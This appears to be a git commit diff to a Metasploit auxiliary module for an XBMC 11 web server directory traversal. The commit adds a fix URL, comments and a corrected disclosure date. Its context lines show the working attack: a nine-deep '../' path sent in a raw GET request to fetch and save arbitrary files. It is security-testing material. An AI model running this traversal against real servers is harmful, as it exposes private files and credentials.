Added fix URL and a few more comments. Corrected date.

bug/bundler_fix
Matt Andreko 2012-11-08 10:09:28 -05:00
parent dac331fa10
commit 6843aa3a6c
1 changed files with 7 additions and 6 deletions

View File

@ -17,21 +17,22 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => "XBMC Web Server Directory Traversal",
'Description' => %q{
This module exploits a directory traversal bug in XBMC 11.
This module exploits a directory traversal bug in XBMC 11, up until the 2012-11-04 nightly build.
The module can only be used to retrieve files.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton
'sinn3r', # Used sinn3r's yaws_traversal exploit as a skeleton
'Lucas "acidgen" Lundgren IOActive',
'Matt "hostess" Andreko',
],
'References' =>
[
['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348']
['URL', 'http://forum.xbmc.org/showthread.php?tid=144110&pid=1227348'],
['URL', 'https://github.com/xbmc/xbmc/commit/bdff099c024521941cb0956fe01d99ab52a65335'],
],
'DisclosureDate' => "Nov 1 2012"
'DisclosureDate' => "Nov 4 2012"
))
register_options(
@ -53,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
end
# Create request
traversal = "../../../../../../../../.."
traversal = "../../../../../../../../.." #The longest of all platforms tested was 9 deep
res = send_request_raw({
'method' => 'GET',
'uri' => "/#{traversal}/#{datastore['FILEPATH']}",
@ -75,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
)
print_good("File saved in: #{path}")
elsif res.code == 401
print_error("#{rhost}:#{rport} Authentication failed")
print_error("#{rhost}:#{rport} Authentication failed")
elsif res.code == 404
print_error("#{rhost}:#{rport} File not found")
end